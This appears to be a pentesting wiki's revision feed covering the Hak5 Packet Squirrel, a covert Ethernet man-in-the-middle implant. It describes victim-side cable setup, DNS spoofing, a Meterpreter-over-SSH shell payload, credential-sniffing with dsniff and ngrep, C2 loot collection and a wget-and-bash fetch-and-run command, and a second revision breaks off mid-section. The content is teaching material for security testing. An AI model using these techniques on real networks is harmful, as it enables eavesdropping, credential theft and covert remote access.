# add in the con config &amp;lt;code&amp;gt;*/15 * * * * start nmap-scan&amp;lt;/code&amp;gt;&lt;br /&gt;
This line start an nmap-scan every 15 minutes.&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
[[LAN Turtle]]&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://docs.hak5.org/hc/en-us/categories/360000979313-LAN-Turtle&lt;br /&gt;
&lt;br /&gt;
[[Category:Pentesting]]&lt;/div&gt;</summary>
		<author><name>Bnagl</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Hak5_Packet_Squirrel&amp;diff=6099</id>
		<title>Hak5 Packet Squirrel</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Hak5_Packet_Squirrel&amp;diff=6099"/>
		<updated>2021-03-09T15:43:12Z</updated>

		<summary type="html">&lt;p&gt;Bnagl: /* References */ added references&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
[[File:Packet Squirrel Connectors.jpg |thumb|right|400px||Packet Squirrel device]]&lt;br /&gt;
&lt;br /&gt;
The Packet Squirrel operates as an Ethernet Man in the Middle and comes  preloaded with three exploit scripts. These three attack modes are Logging Network Traffic, Spoofing DNS and OpenVPN Tunnel. These can also be modified and exchanged with other scripts. It&#039;s stealthy pocket-size enables it to be placed without notice, this can come in handy for penetration testers. The efficient energy usage makes it possible to power it with a battery pack to run over a week.&lt;br /&gt;
The Packet Squirrel can also be combined with the [[Hak5 Cloud C2]], a command and control server specially for Hak5 devices.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
[[File:Hak5_Squirrel_version.jpg|thumb|right|400px||SSH connect]]&lt;br /&gt;
[[File:Hak5_Squirrel_spoofhost.jpg|thumb|right|400px||spoofhost file]]&lt;br /&gt;
[[File:Hak5_Squirrel_browser.jpg|thumb|right|400px||Spoofed browser warning]]&lt;br /&gt;
&lt;br /&gt;
The Packet Squirrel has an switch to choose between the three exploit payloads for logging the TCP dump, Using VPN Tunnelling and for DNS spoofing, or Arming Mode.&lt;br /&gt;
 &lt;br /&gt;
In &#039;&#039;&#039;Arming Mode&#039;&#039;&#039; (switch in 4th position, nearest to the USB port) you can easily access the device with ssh &amp;lt;code&amp;gt;root@172.16.32.1&amp;lt;/code&amp;gt; with the password &amp;lt;code&amp;gt;hak5squirrel&amp;lt;/code&amp;gt;. Therefore Packet Squirrel acts as DHCP server. If you don&#039;t get an IP address, manually configure an IP from the 172.16.32.0/24 network on your ethernet interface. Arming Mode is indicated by a blue blinking LED an allows to configure the different payloads.&lt;br /&gt;
&lt;br /&gt;
It is also possible to gain ssh access to the device during the attack modes with the IP address of the outgoing Ethernet interface as well.    &lt;br /&gt;
&lt;br /&gt;
==== Basic Cable Setup ====&lt;br /&gt;
&lt;br /&gt;
# Plug the victims Ethernet cable into the &amp;quot;Ethernet In&amp;quot; Port&lt;br /&gt;
# Plug the gateway Ethernet cable  into the &amp;quot;Ethernet Out&amp;quot; Port&lt;br /&gt;
# Power the device by plugging in the power cable&lt;br /&gt;
&lt;br /&gt;
==== Firmware Upgrade ====&lt;br /&gt;
&lt;br /&gt;
Shiped devices are installed with version 1.0, which can be seen in the VERSION file in the Packet Squirrel root folder. The current version 3.2 can be downloaded from the Hak5 website.&lt;br /&gt;
&lt;br /&gt;
The file has to be named upgrade-version.bin (where version stands for the version number) and copied to the root directory of an NTFS or EXT4 formatted USB drive.&lt;br /&gt;
&lt;br /&gt;
Plug in the USB drive in the Packet Squirrel and set the select switch to Arming Mode. Then power on the Packet Squirrel. &lt;br /&gt;
&lt;br /&gt;
The upgrade process needs 5 minutes and is indicated by a solid red or blue LED light. When the firmware upgrade is finished, Packet Squirrel reboots and goes in Arming Mode. Shown by a blue blinking LED. &lt;br /&gt;
&lt;br /&gt;
Then you can connect again with SSH and verify the new version, shown in Figure &amp;quot;SSH connect&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
== Payloads ==&lt;br /&gt;
&lt;br /&gt;
=== Logging Network Traffic ===&lt;br /&gt;
&lt;br /&gt;
This mode creates TCP/UDP dumps and saves them on the USB drive to analyse later on.&lt;br /&gt;
Just follow these easy steps:&lt;br /&gt;
&lt;br /&gt;
# A USB Stick with an NTFS file system needs to be plugged in the USB-A Port before the Squirrel is Powered up. &lt;br /&gt;
# Flip the first position (which is nearest to the micro USB power in).&lt;br /&gt;
# Connect the Ethernet cable of the victim into the Ethernet port, which is at the same side as the power in USB connector and Connect the Gateway Ethernet cable to the other Port.&lt;br /&gt;
# Plug the power cable in and wait the one minute long start up sequence. The device can be either powered by the victim machine or by an USB power bank.&lt;br /&gt;
# The data traffic will be captured, if the LED starts blinking Yellow. If otherwise the LED circles between red, green and blue, then the USB stick has the wrong file system.&lt;br /&gt;
# Stop the capturing process by pressing the Button. Then the device takes some seconds to write the tcpdum to the USB Storage. As soon as the LED glows red the saving process has ended and you are good to go.&lt;br /&gt;
# You can now analyse the captured pcap file, located in \loot\tcpdump with [[Wireshark]].&lt;br /&gt;
&lt;br /&gt;
After that, the connection trough the Packet Squirrel is shut down. To allow the client to connect to the network again, Packet Squirrel has to be rebooted.&lt;br /&gt;
&lt;br /&gt;
=== DNS Spoofing Mode ===&lt;br /&gt;
&lt;br /&gt;
This mode spoofs the client with DNS entries to redirect traffic to other IP addresses.&lt;br /&gt;
&lt;br /&gt;
# For this mode we have to start in arming mode (switch at fourth position)&lt;br /&gt;
# After gaining access with ssh we change to the DNS spoofing directory with &amp;lt;code&amp;gt;cd /payloads/switch2&amp;lt;/code&amp;gt;.&lt;br /&gt;
# There we can define the Spoofed domain names by editing the file spoofhost with &amp;lt;code&amp;gt;nano spoofhost&amp;lt;/code&amp;gt;.&lt;br /&gt;
# In the file add entrys like &amp;lt;code&amp;gt;address=/myspoofdomain.at/194.232.104.140&amp;lt;/code&amp;gt; as shown in figure &amp;quot;spoofhost file&amp;quot;. The example IP belongs to orf.at&lt;br /&gt;
# Unplug the Packet Squirrel and shift the switch to the second position.&lt;br /&gt;
# Plug it in and wait until the startup sequence is finished and the LED starts blinking yellow.&lt;br /&gt;
&lt;br /&gt;
By browsing to the spoofed domain, the request gets redirected to the given IP. As shown in figure &amp;quot;Spoofed browser warning&amp;quot; browsers show certificate alerts because the domain and certificate do not match. But this mode can still be used to attack other applications which use domains with no validation.&lt;br /&gt;
&lt;br /&gt;
=== OpenVPN Mode ===&lt;br /&gt;
[[File:Packet Squirrel VPN1.jpg |thumb|right|400px||OpenVPN Access Mode]]&lt;br /&gt;
[[File:Packet Squirrel VPN2.jpg |thumb|right|400px||OpenVPN Tunneling Mode]]&lt;br /&gt;
&lt;br /&gt;
The VPN payload implements VPN access mode and VPN tunnelling mode. &lt;br /&gt;
If you want to Setup your own OpenVPN (OVPN) server follow the instructions at the [https://docs.hak5.org/hc/en-us/articles/360010554013-OpenVPN-Payload hak5 webpage]. For the purpose of testing we use use an existing server from [https://www.freeopenvpn.org/en/ freeopenvpn.org]. &lt;br /&gt;
# Start by selecting the desired server and download the the OVPN access certificate.&lt;br /&gt;
# Set the Packet Squirrel in Arming Mode and connect to its shell&lt;br /&gt;
# Copy the certificate with &amp;lt;code&amp;gt;scp user@server:downloadfolder/filename.ovpn /root/payloads/switch3/config.ovpn&amp;lt;/code&amp;gt;&lt;br /&gt;
# Steer to the directory with &amp;lt;code&amp;gt; cd /root/payloads/switch3/&amp;lt;/code&amp;gt;&lt;br /&gt;
# Edit the config.ovpn at line 30 to &amp;lt;code&amp;gt;auth-user-pass credentials.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
# Add an credentials file with  &amp;lt;code&amp;gt; nano credentials.txt&amp;lt;/code&amp;gt; and add the two lines:&lt;br /&gt;
## &amp;lt;code&amp;gt;freeopenvpn&amp;lt;/code&amp;gt; &lt;br /&gt;
## &amp;lt;code&amp;gt;&amp;lt;the displayed password&amp;gt;&amp;lt;/code&amp;gt; &lt;br /&gt;
# Before starting the VPN we choose the VPN mode:&lt;br /&gt;
## Open the &amp;lt;code&amp;gt;payload.sh&amp;lt;/code&amp;gt; &lt;br /&gt;
## Set the &amp;lt;code&amp;gt;For_Clients=&amp;lt;/code&amp;gt;  to&lt;br /&gt;
### &amp;lt;code&amp;gt;0&amp;lt;/code&amp;gt; for Access Mode&lt;br /&gt;
### &amp;lt;code&amp;gt;1&amp;lt;/code&amp;gt; for Tunneling Mode&lt;br /&gt;
# Now set the Switch the the third Position and plug power out and in again&lt;br /&gt;
# You are good to go, if the yellow LED starts to flash after the boot up sequence  &lt;br /&gt;
==== Access Mode ====&lt;br /&gt;
&lt;br /&gt;
Access mode allows the squirrel to access the VPN Network via the Secure Shell&lt;br /&gt;
If the connection was established if the command &amp;lt;code&amp;gt;ifconfig tun0&amp;lt;/code&amp;gt; show the following output when it is issued at the Packet Squirrels Shell.&lt;br /&gt;
 tun0 &lt;br /&gt;
      Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00&lt;br /&gt;
      inet addr:192.168.231.245 P-t-P:192.168.231.245 Mask:255.255.255.0&lt;br /&gt;
      UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1500 Metric:1&lt;br /&gt;
      RX packets:12 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
      TX packets:8 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
      collisions:0 txqueuelen:100&lt;br /&gt;
      RX bytes:1404 (1.3 KiB) TX bytes:608 (608.0 B)&lt;br /&gt;
&lt;br /&gt;
The Access Mode can be used to access an Private network that is used for testing and pen testing purposes like an honeypot virtual machine.&lt;br /&gt;
&lt;br /&gt;
==== Tunneling Mode ====&lt;br /&gt;
&lt;br /&gt;
The Tunnelling mode encapsulates all the traffic and sends it to the VPN Server, from where it is send to the internet. VPN Tunnelling allows users to disguise their IP address you can check your current IP address with [https://www.ipchicken.com ipchicken.com].&lt;br /&gt;
&lt;br /&gt;
You can also install an simple openVPN Server on a linux machine with&lt;br /&gt;
&amp;lt;code&amp;gt;wget https://git.io/vpn -O openvpn.sh &amp;amp;&amp;amp; bash openvpn.sh&amp;lt;/code&amp;gt;&lt;br /&gt;
and press Enter 6 times.&lt;br /&gt;
Then copy the generated client.ovpn file to Packet Squirrel in the /payload/switch3 folder and restart it with the switch on third position.&lt;br /&gt;
=== Meterpreter-via-SSH ===&lt;br /&gt;
[[File:Packet squirrel meterpreter ssh.PNG |thumb|right|400px||Packet Squirrel Payload Meterpreter-via-SSH settings]]&lt;br /&gt;
This payload starts the Packet Squirrel in NAT mode and waits for user input. When the button is pressed, the payload connects to a remote SSH server and creates a local port tunnel. It then launches a meterpreter shell over the tunnel.&lt;br /&gt;
The intent is to hide the meterpreter network traffic behind a legitimate SSH activity.&lt;br /&gt;
You can download this payload from the offical [https://github.com/hak5/packetsquirrel-payloads/tree/master/payloads/library/remote-access/Meterpreter-via-SSH hak5 github].&lt;br /&gt;
==== Getting Started ====&lt;br /&gt;
Copy the playload to the Packet Squirrel into the desired switch folder. Now edit the scirpt to configure your server  options:&lt;br /&gt;
* SSH_USER - username on remote SSH server&lt;br /&gt;
* SSH_HOST - ip address of remote SSH Server&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Note:&#039;&#039;&#039; If you changed the default meterpreter port don&#039;t forget to change it on the metasploit side as well.&lt;br /&gt;
* MSF_PORT&lt;br /&gt;
&lt;br /&gt;
===== Generate SSH Key on Squirrel =====&lt;br /&gt;
Now you have to generate an ssh key-pair (just use default location and empty password) on your Packet Squirrel:&lt;br /&gt;
 root@squirrel:~# ssh-keygen&lt;br /&gt;
===== Allow Squirrel on SSH Server =====&lt;br /&gt;
Then you have to copy the contents of /root/.ssh/id_rsa.pub from Packet Squirrel to the SSH Server authorized file:&lt;br /&gt;
&lt;br /&gt;
 user@server:~# mkdir ~/.ssh&lt;br /&gt;
 user@server:~# echo &#039;paste id_rsa.pub contents inside this quote&#039; &amp;gt; ~/.ssh/authorized_keys&lt;br /&gt;
===== Run Metasploit with Resource =====&lt;br /&gt;
 msf@server:~# msfconsole -r server.rc&lt;br /&gt;
&lt;br /&gt;
==== LED Definitions ====&lt;br /&gt;
# Configure NETMODE&lt;br /&gt;
#* Solid Magenta&lt;br /&gt;
# Connect to SSH Server&lt;br /&gt;
#* SUCCESS - Blink Amber 5 Times&lt;br /&gt;
#* FAIL - Blink Red 2 Times&lt;br /&gt;
# Launch meterpreter&lt;br /&gt;
#* SUCESS - Blink Cyan 1 Time&lt;br /&gt;
#* FAIL - Blink Red 1 Time&lt;br /&gt;
&lt;br /&gt;
==== Hardening Recommendations ====&lt;br /&gt;
# Use an accout with limited privileges for SSH acces on the server.&lt;br /&gt;
# User a dedicated account for Packet Squirrel device (audit usage with SSH access logs).&lt;br /&gt;
# Disable PasswordAuthentication in sshd_config on the server.&lt;br /&gt;
&lt;br /&gt;
=== ISpyintel ===&lt;br /&gt;
[[File:Packet squirrel ispyintel.PNG |thumb|right|400px||Packet Squirrel Payload ISpyIntel settings]]&lt;br /&gt;
This payload will automate gathering various recon data on whatever passes between it&#039;s Ethernet ports. You can download this payload from the [https://github.com/hak5/packetsquirrel-payloads/tree/master/payloads/library/sniffing/ispyintel official hak5 github].&lt;br /&gt;
&#039;&#039;&#039;Note:&#039;&#039;&#039; This payload requires a usb stick to store loot.&lt;br /&gt;
==== Setup ====&lt;br /&gt;
# Edit the config variables at the top. The main variables are:&lt;br /&gt;
## &amp;lt;code&amp;gt;lootPath=&amp;quot;/mnt/loot/intel&amp;quot;  # Path to loot&amp;lt;/code&amp;gt;&lt;br /&gt;
## &amp;lt;code&amp;gt;mode=&amp;quot;TRANSPARENT&amp;quot;          # Network mode we want to use&amp;lt;/code&amp;gt;&lt;br /&gt;
## &amp;lt;code&amp;gt;interface=&amp;quot;br-lan&amp;quot;          # Interface to listen on&amp;lt;/code&amp;gt;&lt;br /&gt;
# Copy payload.sh into the ~/payloads/switch folder you wish to deploy on.&lt;br /&gt;
# Connect into a target machine with access to the LAN.&lt;br /&gt;
# Set switch to the spot and power up.&lt;br /&gt;
# Leave, get coffee, take a nap while everything is recorded and parsed for future use.&lt;br /&gt;
# When done; hit the button. The LED will rapidly flash white to let you know it is finishing up.&lt;br /&gt;
# When all is done the LED will just go blank. It is now safe to unplug and go about your day.&lt;br /&gt;
&lt;br /&gt;
==== Tasks that are started ====&lt;br /&gt;
* tcpdump - records every packet that was send and received&lt;br /&gt;
* urlsnarf - collects all websites that were visited&lt;br /&gt;
* dsniff - attempts to acquire passwords and what not&lt;br /&gt;
* ngrep - on ports 80 and 21 with the filter for common password fields&lt;br /&gt;
* ngrep - on ports 80 and 21 with the filter for common session id fields&lt;br /&gt;
* log.txt - logs the progress of the payload for troubleshooting&lt;br /&gt;
&lt;br /&gt;
==== Clean Up ====&lt;br /&gt;
Once the button is pressed the payload will automatically parse the TCPDump log file for the following items and store the results in seperate files.&lt;br /&gt;
As this process can take some time the LED will change to a rapid white blink letting you know the button command was recieved and the payload is in the process of shutting down.&lt;br /&gt;
* ipv4found.txt Will contain a unique list of all the ipv4 which the pcap file contains&lt;br /&gt;
* maybeEmails.txt Is a very loose search for possible email addresses that came across the wire in plain text.&lt;br /&gt;
&lt;br /&gt;
=== Creating your own Payloads ===&lt;br /&gt;
&lt;br /&gt;
The Packet Squirrel allows us to create our own attack payloads by loading them to the USB stick and naming them Switch1 to Switch3.&lt;br /&gt;
It allows as to create payload in python, bash or PHP. For Python and Bash it is important to use the interpreter directive Python: &amp;lt;code&amp;gt;#!/usr/bin/python&amp;lt;/code&amp;gt;, bash: &amp;lt;code&amp;gt;#!/usr/bin/bash&amp;lt;/code&amp;gt;.&lt;br /&gt;
Bash scripts can access the following pre-installed tools:&lt;br /&gt;
openvpn, autossh, tcpdump, meterpreter-https, cron, nmap, ncat-ssl, ncat, sshfs, tcpdump and wget&lt;br /&gt;
&lt;br /&gt;
The featured Squirrel Script offers the following additional commands:&lt;br /&gt;
&lt;br /&gt;
* NETMODE&lt;br /&gt;
specifies which network mode Packet Sqirrel uses and how traffic is routed&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! Command !! Description&lt;br /&gt;
|-&lt;br /&gt;
| NETMODE BRIDGE || Creates a bridge between the IN and OUT ehternet interface, with an own IP address for Packet Sqirrel&lt;br /&gt;
|-&lt;br /&gt;
| NETMODE TRANSPARENT || Also creates a bridge between the interfaces but with no own IP address&lt;br /&gt;
|-&lt;br /&gt;
| NETMODE NAT || Packet Squirrel gets an IP address from the target network, the client gets an IP from Packet Squirrel&lt;br /&gt;
|-&lt;br /&gt;
| NETMODE VPN || same as NAT with VPN interface for client tunneling&lt;br /&gt;
|-&lt;br /&gt;
| NETMODE CLONE || Clones the MAC address from the target client and uses it to connect to the LAN&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* LED&lt;br /&gt;
with this command the multi-color LED can be controlled &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! Possible configurations !! Description&lt;br /&gt;
|-&lt;br /&gt;
| LED Colors || red, green, blue, yellow, cyan, magenta, white&lt;br /&gt;
|-&lt;br /&gt;
| LED Patterns || SOLID, SLOW, FAST, SINGLE, DOUBLE, TRIPLE, SUCCESS, 1-10000&lt;br /&gt;
|-&lt;br /&gt;
| LED State || SETUP, FAIL, ATTACK, STAGE, SPECIAL, CLEANUP, FINISH&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* BUTTON&lt;br /&gt;
The BUTTON command pauses the paylpoad until the hardware button is pressed or a specified time has passed&lt;br /&gt;
&lt;br /&gt;
* SWITCH&lt;br /&gt;
The SWITCH command returns the current position of the hardware payload selection switch. Output is &amp;quot;switch1&amp;quot;, &amp;quot;switch2&amp;quot;, &amp;quot;switch3&amp;quot; or &amp;quot;switch4&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
==== Example ====&lt;br /&gt;
[[File:Hak5 C2 start.jpg |thumb|right|400px||C2 server start]]&lt;br /&gt;
[[File:Hak5 c2 dashboard.jpg |thumb|right|400px||C2 Dashboard]]&lt;br /&gt;
[[File:Hak5 c2 sqirrel.jpg |thumb|right|400px||C2 Packet Squirrel]]&lt;br /&gt;
&lt;br /&gt;
Here is an example for the usage of Squirrel Script.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# Title: Caternet&lt;br /&gt;
# Author: Hak5Darren&lt;br /&gt;
# Version: 1.0&lt;br /&gt;
# Description: Forwards all traffic to local webserver hosting cat photos.&lt;br /&gt;
# Props: In loving memory of Hak5Kerby&lt;br /&gt;
&lt;br /&gt;
LED SETUP&lt;br /&gt;
NETMODE NAT&lt;br /&gt;
echo &amp;quot;address=/#/172.16.32.1&amp;quot; &amp;gt; /tmp/dnsmasq.address&lt;br /&gt;
/etc/init.d/dnsmasq restart&lt;br /&gt;
&lt;br /&gt;
LED ATTACK&lt;br /&gt;
iptables -A PREROUTING -t nat -i eth0 -p udp --dport 53 -j REDIRECT --to-port 53&lt;br /&gt;
python -m SimpleHTTPServer 80&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
For more information go to the [https://docs.hak5.org/hc/en-us/sections/360002180414-Payload-Development hak5.org webpage].&lt;br /&gt;
&lt;br /&gt;
== with Cloud C2 ==&lt;br /&gt;
&lt;br /&gt;
The [[Hak5 Cloud C2]] is a command and control server for Hak5 devices. Installation and startup is shown in figure &amp;quot;C2 server start&amp;quot;. By browsing to the configured address you can login to the dashboard, shown in figure &amp;quot;C2 dashboard&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
To connect the Packet Squirrel with your C2 Cloud, click on the plus button in the lower right corner and choose the device. On the dashboard, open the added device and click on Setup, as shown in figure &amp;quot;C2 Packet Sqirrel&amp;quot;. Then copy the downloaded file to the Packet Squirrel&#039;s /etc folder and reboot it. &lt;br /&gt;
In the Overview tab you can also Edit, Reboot, Wipe and Remove your device. &lt;br /&gt;
&lt;br /&gt;
In the Clients tab you can see all clients which were connected to your Packet Squirrel with hostname, MAC and IP address. In the Loot tab, you can open the current loot from your Packet Squirrel directly on your C2 server. And in the Terminal tab you can open a ssh session to your device.&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
[[Packet Squirrel]]&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://docs.hak5.org/hc/en-us/categories/360000982574-Packet-Squirrel&lt;br /&gt;
* https://docs.hak5.org/hc/en-us/categories/360001177114-Cloud-C2&lt;br /&gt;
* https://docs.hak5.org/hc/en-us/articles/360010554613-Ducky-Script-for-Packet-Squirrel&lt;br /&gt;
* https://downloads.hak5.org/&lt;br /&gt;
* https://github.com/hak5/packetsquirrel-payloads/tree/master/payloads/library&lt;br /&gt;
&lt;br /&gt;
[[Category:Pentesting]]&lt;/div&gt;</summary>
		<author><name>Bnagl</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Hak5_Packet_Squirrel&amp;diff=6098</id>
		<title>Hak5 Packet Squirrel</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Hak5_Packet_Squirrel&amp;diff=6098"/>
		<updated>2021-03-09T15:40:26Z</updated>

		<summary type="html">&lt;p&gt;Bnagl: /* Creating your own Payloads */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
[[File:Packet Squirrel Connectors.jpg |thumb|right|400px||Packet Squirrel device]]&lt;br /&gt;
&lt;br /&gt;
The Packet Squirrel operates as an Ethernet Man in the Middle and comes  preloaded with three exploit scripts. These three attack modes are Logging Network Traffic, Spoofing DNS and OpenVPN Tunnel. These can also be modified and exchanged with other scripts. It&#039;s stealthy pocket-size enables it to be placed without notice, this can come in handy for penetration testers. The efficient energy usage makes it possible to power it with a battery pack to run over a week.&lt;br /&gt;
The Packet Squirrel can also be combined with the [[Hak5 Cloud C2]], a command and control server specially for Hak5 devices.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
[[File:Hak5_Squirrel_version.jpg|thumb|right|400px||SSH connect]]&lt;br /&gt;
[[File:Hak5_Squirrel_spoofhost.jpg|thumb|right|400px||spoofhost file]]&lt;br /&gt;
[[File:Hak5_Squirrel_browser.jpg|thumb|right|400px||Spoofed browser warning]]&lt;br /&gt;
&lt;br /&gt;
The Packet Squirrel has an switch to choose between the three exploit payloads for logging the TCP dump, Using VPN Tunnelling and for DNS spoofing, or Arming Mode.&lt;br /&gt;
 &lt;br /&gt;
In &#039;&#039;&#039;Arming Mode&#039;&#039;&#039; (switch in 4th position, nearest to the USB port) you can easily access the device with ssh &amp;lt;code&amp;gt;root@172.16.32.1&amp;lt;/code&amp;gt; with the password &amp;lt;code&amp;gt;hak5squirrel&amp;lt;/code&amp;gt;. Therefore Packet Squirrel acts as DHCP server. If you don&#039;t get an IP address, manually configure an IP from the 172.16.32.0/24 network on your ethernet interface. Arming Mode is indicated by a blue blinking LED an allows to configure the different payloads.&lt;br /&gt;
&lt;br /&gt;
It is also possible to gain ssh access to the device during the attack modes with the IP address of the outgoing Ethernet interface as well.    &lt;br /&gt;
&lt;br /&gt;
==== Basic Cable Setup ====&lt;br /&gt;
&lt;br /&gt;
# Plug the victims Ethernet cable into the &amp;quot;Ethernet In&amp;quot; Port&lt;br /&gt;
# Plug the gateway Ethernet cable  into the &amp;quot;Ethernet Out&amp;quot; Port&lt;br /&gt;
# Power the device by plugging in the power cable&lt;br /&gt;
&lt;br /&gt;
==== Firmware Upgrade ====&lt;br /&gt;
&lt;br /&gt;
Shiped devices are installed with version 1.0, which can be seen in the VERSION file in the Packet Squirrel root folder. The current version 3.2 can be downloaded from the Hak5 website.&lt;br /&gt;
&lt;br /&gt;
The file has to be named upgrade-version.bin (where version stands for the version number) and copied to the root directory of an NTFS or EXT4 formatted USB drive.&lt;br /&gt;
&lt;br /&gt;
Plug in the USB drive in the Packet Squirrel and set the select switch to Arming Mode. Then power on the Packet Squirrel. &lt;br /&gt;
&lt;br /&gt;
The upgrade process needs 5 minutes and is indicated by a solid red or blue LED light. When the firmware upgrade is finished, Packet Squirrel reboots and goes in Arming Mode. Shown by a blue blinking LED. &lt;br /&gt;
&lt;br /&gt;
Then you can connect again with SSH and verify the new version, shown in Figure &amp;quot;SSH connect&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
== Payloads ==&lt;br /&gt;
&lt;br /&gt;
=== Logging Network Traffic ===&lt;br /&gt;
&lt;br /&gt;
This mode creates TCP/UDP dumps and saves them on the USB drive to analyse later on.&lt;br /&gt;
Just follow these easy steps:&lt;br /&gt;
&lt;br /&gt;
# A USB Stick with an NTFS file system needs to be plugged in the USB-A Port before the Squirrel is Powered up. &lt;br /&gt;
# Flip the first position (which is nearest to the micro USB power in).&lt;br /&gt;
# Connect the Ethernet cable of the victim into the Ethernet port, which is at the same side as the power in USB connector and Connect the Gateway Ethernet cable to the other Port.&lt;br /&gt;
# Plug the power cable in and wait the one minute long start up sequence. The device can be either powered by the victim machine or by an USB power bank.&lt;br /&gt;
# The data traffic will be captured, if the LED starts blinking Yellow. If otherwise the LED circles between red, green and blue, then the USB stick has the wrong file system.&lt;br /&gt;
# Stop the capturing process by pressing the Button. Then the device takes some seconds to write the tcpdum to the USB Storage. As soon as the LED glows red the saving process has ended and you are good to go.&lt;br /&gt;
# You can now analyse the captured pcap file, located in \loot\tcpdump with [[Wireshark]].&lt;br /&gt;
&lt;br /&gt;
After that, the connection trough the Packet Squirrel is shut down. To allow the client to connect to the network again, Packet Squirrel has to be rebooted.&lt;br /&gt;
&lt;br /&gt;
=== DNS Spoofing Mode ===&lt;br /&gt;
&lt;br /&gt;
This mode spoofs the client with DNS entries to redirect traffic to other IP addresses.&lt;br /&gt;
&lt;br /&gt;
# For this mode we have to start in arming mode (switch at fourth position)&lt;br /&gt;
# After gaining access with ssh we change to the DNS spoofing directory with &amp;lt;code&amp;gt;cd /payloads/switch2&amp;lt;/code&amp;gt;.&lt;br /&gt;
# There we can define the Spoofed domain names by editing the file spoofhost with &amp;lt;code&amp;gt;nano spoofhost&amp;lt;/code&amp;gt;.&lt;br /&gt;
# In the file add entrys like &amp;lt;code&amp;gt;address=/myspoofdomain.at/194.232.104.140&amp;lt;/code&amp;gt; as shown in figure &amp;quot;spoofhost file&amp;quot;. The example IP belongs to orf.at&lt;br /&gt;
# Unplug the Packet Squirrel and shift the switch to the second position.&lt;br /&gt;
# Plug it in and wait until the startup sequence is finished and the LED starts blinking yellow.&lt;br /&gt;
&lt;br /&gt;
By browsing to the spoofed domain, the request gets redirected to the given IP. As shown in figure &amp;quot;Spoofed browser warning&amp;quot; browsers show certificate alerts because the domain and certificate do not match. But this mode can still be used to attack other applications which use domains with no validation.&lt;br /&gt;
&lt;br /&gt;
=== OpenVPN Mode ===&lt;br /&gt;
[[File:Packet Squirrel VPN1.jpg |thumb|right|400px||OpenVPN Access Mode]]&lt;br /&gt;
[[File:Packet Squirrel VPN2.jpg |thumb|right|400px||OpenVPN Tunneling Mode]]&lt;br /&gt;
&lt;br /&gt;
The VPN payload implements VPN access mode and VPN tunnelling mode. &lt;br /&gt;
If you want to Setup your own OpenVPN (OVPN) server follow the instructions at the [https://docs.hak5.org/hc/en-us/articles/360010554013-OpenVPN-Payload hak5 webpage]. For the purpose of testing we use use an existing server from [https://www.freeopenvpn.org/en/ freeopenvpn.org]. &lt;br /&gt;
# Start by selecting the desired server and download the the OVPN access certificate.&lt;br /&gt;
# Set the Packet Squirrel in Arming Mode and connect to its shell&lt;br /&gt;
# Copy the certificate with &amp;lt;code&amp;gt;scp user@server:downloadfolder/filename.ovpn /root/payloads/switch3/config.ovpn&amp;lt;/code&amp;gt;&lt;br /&gt;
# Steer to the directory with &amp;lt;code&amp;gt; cd /root/payloads/switch3/&amp;lt;/code&amp;gt;&lt;br /&gt;
# Edit the config.ovpn at line 30 to &amp;lt;code&amp;gt;auth-user-pass credentials.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
# Add an credentials file with  &amp;lt;code&amp;gt; nano credentials.txt&amp;lt;/code&amp;gt; and add the two lines:&lt;br /&gt;
## &amp;lt;code&amp;gt;freeopenvpn&amp;lt;/code&amp;gt; &lt;br /&gt;
## &amp;lt;code&amp;gt;&amp;lt;the displayed password&amp;gt;&amp;lt;/code&amp;gt; &lt;br /&gt;
# Before starting the VPN we choose the VPN mode:&lt;br /&gt;
## Open the &amp;lt;code&amp;gt;payload.sh&amp;lt;/code&amp;gt; &lt;br /&gt;
## Set the &amp;lt;code&amp;gt;For_Clients=&amp;lt;/code&amp;gt;  to&lt;br /&gt;
### &amp;lt;code&amp;gt;0&amp;lt;/code&amp;gt; for Access Mode&lt;br /&gt;
### &amp;lt;code&amp;gt;1&amp;lt;/code&amp;gt; for Tunneling Mode&lt;br /&gt;
# Now set the Switch the the third Position and plug power out and in again&lt;br /&gt;
# You are good to go, if the yellow LED starts to flash after the boot up sequence  &lt;br /&gt;
==== Access Mode ====&lt;br /&gt;
&lt;br /&gt;
Access mode allows the squirrel to access the VPN Network via the Secure Shell&lt;br /&gt;
If the connection was established if the command &amp;lt;code&amp;gt;ifconfig tun0&amp;lt;/code&amp;gt; show the following output when it is issued at the Packet Squirrels Shell.&lt;br /&gt;
